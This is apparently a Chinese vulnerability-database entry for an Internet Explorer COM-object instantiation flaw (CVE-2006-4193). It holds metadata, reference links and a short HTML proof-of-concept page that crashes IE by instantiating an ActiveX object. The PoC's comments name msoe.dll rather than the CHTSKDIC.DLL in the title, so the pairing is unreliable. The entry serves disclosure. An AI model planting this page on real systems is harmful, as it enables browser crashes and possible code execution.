Microsoft IE CHTSKDIC.DLL任意代码执行漏洞(MS07-027)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110824 漏洞类型 其他
发布时间 2006-08-15 更新时间 2006-08-24
CVE编号 CVE-2006-4193 CNNVD-ID CNNVD-200608-259
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28389
https://cxsecurity.com/issue/WLB-2006080111
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-259
|漏洞详情
InternetExplorer是微软发布的非常流行的WEB浏览器。InternetExplorer在试图将CHTSKDIC.DLL(MicrosoftIME)COM对象实例化为ActiveX控件时可能会破坏系统内存,导致拒绝服务或执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/19530/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability. 

This issue occurs because the application fails to load a DLL library when instantiated as an ActiveX control.

An attacker may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users, and may cause arbitrary code to run within the context of the application.

 <!--
 // Internet Explorer (msoe.dll) COM Object Instantiation Vulnerability
 // tested: 2000SP4/XPSP2 CN

 // http://www.xsec.org
 // nop (nop#xsec.org)

 // CLSID: {233A9694-667E-11d1-9DFB-006097D50408}
 // Info: Outlook Express Address Book
 // ProgID: OutlookExpress.AddressBook.1
 // InprocServer32: %ProgramFiles%\Outlook Express\msoe.dll

 --!>
 <html><body>
 <object classid="CLSID:{233A9694-667E-11d1-9DFB-006097D50408}" ></object>
 </body></html>
|参考资料

来源:MISC
链接:http://www.xsec.org/index.php?module=releases&act=view&type=1&id=9
来源:MISC
链接:http://www.xsec.org/index.php?module=releases&act=view&type=1&id=8
来源:MISC
链接:http://www.xsec.org/index.php?module=releases&act=view&type=1&id=10
来源:BID
名称:19530
链接:http://www.securityfocus.com/bid/19530
来源:BID
名称:19529
链接:http://www.securityfocus.com/bid/19529
来源:BID
名称:19521
链接:http://www.securityfocus.com/bid/19521
来源:BUGTRAQ
名称:20060815[XSec-06-04]:InternetExplorer(msoe.dll)COMObjectInstantiationVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/443299/100/0/threaded
来源:BUGTRAQ
名称:20060815[XSec-06-03]:InternetExplorer(CHTSKDIC.DLL)COMObjectInstantiationVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/443295/100/0/threaded
来源:BUGTRAQ
名称:20060815[XSec-06-02]:InternetExplorer(IMSKDIC.DLL)COMObjectInstantiationVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/443290/100/0/threaded
来源:XF
名称:ie-msoe-dos(28439)
链接:http://xforce.iss.net/xforce/xfdb/28439